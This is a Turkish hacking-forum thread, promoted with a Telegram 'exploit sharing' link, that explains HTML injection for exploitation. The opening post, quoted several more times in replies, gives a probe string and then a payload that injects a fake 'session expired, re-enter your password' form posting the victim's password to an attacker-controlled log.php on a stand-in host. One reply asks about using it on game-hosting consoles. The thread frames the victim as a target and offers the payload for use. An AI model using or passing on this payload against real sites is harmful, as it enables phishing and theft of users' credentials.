exploit paylaşım grubumuz: t.me/HTTPwnn

HTML İnjection nedir , nasıl sömürülür.

  • Konu başlatıcı Konu başlatıcı fientix
  • Başlangıç Tarihi Başlangıç Tarihi
Katılım
14 Haz 2026
Mesaj
180
Reaksiyon
180
Puan
43
xentr_thread_starter
Selamlar...

HTML Injection olayını en basit şekilde anlatıyorum.
Sitede bir arama kutusu veya yorum alanı var diyelim. Buraya bir şey yazınca site bunu filtrelemeden direkt ekrana basıyorsa açık var demektir. Biz de normal yazı yazmak yerine HTML kodu yazarak sitenin yapısını değiştiriyoruz.

Nasıl test edilir ve sömürülür:
<h1>test</h1>
Eğer sayfada "test" yazısı kocaman ve kalın puntolarla çıktıysa, site bu kodu çalıştırmış demektir. Yani açık aktiftir.

Sömürme aşaması :
Yazı büyütmek yerine sayfaya sahte bir giriş formu gömerek bilgi toplanabilir. Girdi alanına şu tarz bir kod enjekte edildiğini düşünün:

<form action="http://kendisunucunuz.com/log.php" method="POST">
<p>oturumunuz sona erdi , lütfen tekrar şifre girin:</p>
<input type="password" name="sifre">
<input type="submit" value="Giriş Yap">
</form>

Kurban bu sayfaya girdiğinde karşısına bu form çıkar. Şifresini yazdığı an veriler sizin belirttiğiniz log.php dosyasına post edilir.

Anlatacaklarım bu kadardı iyi günler...
 
Selamlar...

HTML Injection olayını en basit şekilde anlatıyorum.
Sitede bir arama kutusu veya yorum alanı var diyelim. Buraya bir şey yazınca site bunu filtrelemeden direkt ekrana basıyorsa açık var demektir. Biz de normal yazı yazmak yerine HTML kodu yazarak sitenin yapısını değiştiriyoruz.

Nasıl test edilir ve sömürülür:
<h1>test</h1>
Eğer sayfada "test" yazısı kocaman ve kalın puntolarla çıktıysa, site bu kodu çalıştırmış demektir. Yani açık aktiftir.

Sömürme aşaması :
Yazı büyütmek yerine sayfaya sahte bir giriş formu gömerek bilgi toplanabilir. Girdi alanına şu tarz bir kod enjekte edildiğini düşünün:

<form action="http://kendisunucunuz.com/log.php" method="POST">
<p>oturumunuz sona erdi , lütfen tekrar şifre girin:</p>
<input type="password" name="sifre">
<input type="submit" value="Giriş Yap">
</form>

Kurban bu sayfaya girdiğinde karşısına bu form çıkar. Şifresini yazdığı an veriler sizin belirttiğiniz log.php dosyasına post edilir.

Anlatacaklarım bu kadardı iyi günler...
eline emeğine sağlık aternos gibi sunuculardada çalışıyormuş galiba konsoldayken sahibi doğru mu acaba bir bilgin varmı?
 
eline emeğine sağlık aternos gibi sunuculardada çalışıyormuş galiba konsoldayken sahibi doğru mu acaba bir bilgin varmı?
videosunu cekmisti bir adam, tamamen verilen konsol komutunun sitede nasıl işlendiğine bağlı eğerki sanitize etmeden ekrana basıyorsa dediğin gibi html injection oluşturabilirsin
 
Selamlar...

HTML Injection olayını en basit şekilde anlatıyorum.
Sitede bir arama kutusu veya yorum alanı var diyelim. Buraya bir şey yazınca site bunu filtrelemeden direkt ekrana basıyorsa açık var demektir. Biz de normal yazı yazmak yerine HTML kodu yazarak sitenin yapısını değiştiriyoruz.

Nasıl test edilir ve sömürülür:
<h1>test</h1>
Eğer sayfada "test" yazısı kocaman ve kalın puntolarla çıktıysa, site bu kodu çalıştırmış demektir. Yani açık aktiftir.

Sömürme aşaması :
Yazı büyütmek yerine sayfaya sahte bir giriş formu gömerek bilgi toplanabilir. Girdi alanına şu tarz bir kod enjekte edildiğini düşünün:

<form action="http://kendisunucunuz.com/log.php" method="POST">
<p>oturumunuz sona erdi , lütfen tekrar şifre girin:</p>
<input type="password" name="sifre">
<input type="submit" value="Giriş Yap">
</form>

Kurban bu sayfaya girdiğinde karşısına bu form çıkar. Şifresini yazdığı an veriler sizin belirttiğiniz log.php dosyasına post edilir.

Anlatacaklarım bu kadardı iyi günler...
e.s
 
Selamlar...

HTML Injection olayını en basit şekilde anlatıyorum.
Sitede bir arama kutusu veya yorum alanı var diyelim. Buraya bir şey yazınca site bunu filtrelemeden direkt ekrana basıyorsa açık var demektir. Biz de normal yazı yazmak yerine HTML kodu yazarak sitenin yapısını değiştiriyoruz.

Nasıl test edilir ve sömürülür:
<h1>test</h1>
Eğer sayfada "test" yazısı kocaman ve kalın puntolarla çıktıysa, site bu kodu çalıştırmış demektir. Yani açık aktiftir.

Sömürme aşaması :
Yazı büyütmek yerine sayfaya sahte bir giriş formu gömerek bilgi toplanabilir. Girdi alanına şu tarz bir kod enjekte edildiğini düşünün:

<form action="http://kendisunucunuz.com/log.php" method="POST">
<p>oturumunuz sona erdi , lütfen tekrar şifre girin:</p>
<input type="password" name="sifre">
<input type="submit" value="Giriş Yap">
</form>

Kurban bu sayfaya girdiğinde karşısına bu form çıkar. Şifresini yazdığı an veriler sizin belirttiğiniz log.php dosyasına post edilir.

Anlatacaklarım bu kadardı iyi günler...
e.s
 
Geri
En Üst